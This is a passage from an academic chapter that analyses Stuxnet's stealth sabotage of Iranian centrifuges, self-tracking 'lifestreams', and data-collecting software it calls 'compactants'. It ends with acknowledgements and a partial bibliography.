The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. The analysis performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
  [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for the kind permission to use his work, 'The sublime brain [of Jonathon]', for the cover of the book which represents a neuronal frontal portait of an individual, for more of his excellent work please see [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) 'Duqu Trojan used 'unknown' programming language: Kaspersky', CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) 'How To Manufacture&amp;amp;nbsp;Desire', ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) 'The cyber-road not taken.', ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
